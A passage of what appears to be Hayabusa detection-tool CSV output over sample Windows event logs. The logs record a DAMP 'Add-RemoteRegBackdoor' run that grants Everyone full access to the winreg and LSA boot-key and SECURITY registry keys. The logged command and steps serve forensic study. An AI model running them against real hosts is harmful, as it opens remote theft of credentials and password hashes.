+09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 
0x2a2f10a,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:56.052 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,../hayabusa-rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:56.099 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,../hayabusa-rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:50:56.146 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,../hayabusa-rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 03:51:16.683 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x9e8 | User: FS03$ | LID: 
0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 2021-12-10 04:54:03.261 +09:00,fs03vuln.offsec.lan,4104,info,,PwSh Scriptblock Log,Add-RemoteRegBackdoor -ComputerName FS03 -Trustee 'S-1-1-0',../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.261 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : ] Using trustee username 'Everyone'""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.370 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-WmiObject): ""Get-WmiObject"" ParameterBinding(Get-WmiObject): name=""Class""; value=""Win32_Service"" ParameterBinding(Get-WmiObject): name=""Filter""; value=""name='RemoteRegistry'"" ParameterBinding(Get-WmiObject): name=""ComputerName""; value=""FS03""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.370 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" 
ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03] Attaching to remote registry through StdRegProv""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.370 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-WmiObject): ""Get-WmiObject"" ParameterBinding(Get-WmiObject): name=""Namespace""; value=""root/default"" ParameterBinding(Get-WmiObject): name=""Class""; value=""Meta_Class"" ParameterBinding(Get-WmiObject): name=""Filter""; value=""__CLASS = 'StdRegProv'"" ParameterBinding(Get-WmiObject): name=""ComputerName""; value=""FS03""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.386 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Backdooring started for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.417 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Creating ACE with Access Mask of 983103 
(ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.417 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.435 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Creating the trustee WMI object with user 'Everyone'""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.435 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Trustee""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.435 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Applying Trustee to new Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.451 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Calling SetSecurityDescriptor on the key with the newly created Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.453 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Backdooring completed for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.453 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline 
Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\JD] Backdooring started for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.453 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\JD] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.453 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.468 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\JD] Creating the trustee WMI object with user 
'Everyone'""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.468 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Trustee""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.468 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\JD] Applying Trustee to new Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.468 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\JD] Calling SetSecurityDescriptor on the key with the newly created Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI 
(DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.486 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\JD] Backdooring completed for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.486 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Backdooring started for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.494 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.494 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; 
value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.494 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Creating the trustee WMI object with user 'Everyone'""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.494 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Trustee""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.503 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Applying Trustee to new 
Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.503 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Calling SetSecurityDescriptor on the key with the newly created Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.503 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Backdooring completed for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.503 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Data] Backdooring started for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on 
source.evtx 2021-12-10 04:54:03.519 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Data] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.519 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.519 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Data] Creating the trustee WMI object with user 'Everyone'""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.519 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; 
value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Trustee""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.535 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Data] Applying Trustee to new Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.540 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Data] Calling SetSecurityDescriptor on the key with the newly created Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.540 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Data] Backdooring completed for 
key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.540 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Backdooring started for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.556 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.556 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission 
change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.556 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Creating the trustee WMI object with user 'Everyone'""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.556 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Trustee""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.556 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Applying Trustee to new Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.571 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : 
SYSTEM\CurrentControlSet\Control\Lsa\GBG] Calling SetSecurityDescriptor on the key with the newly created Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.571 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Backdooring completed for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.571 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SECURITY] Backdooring started for 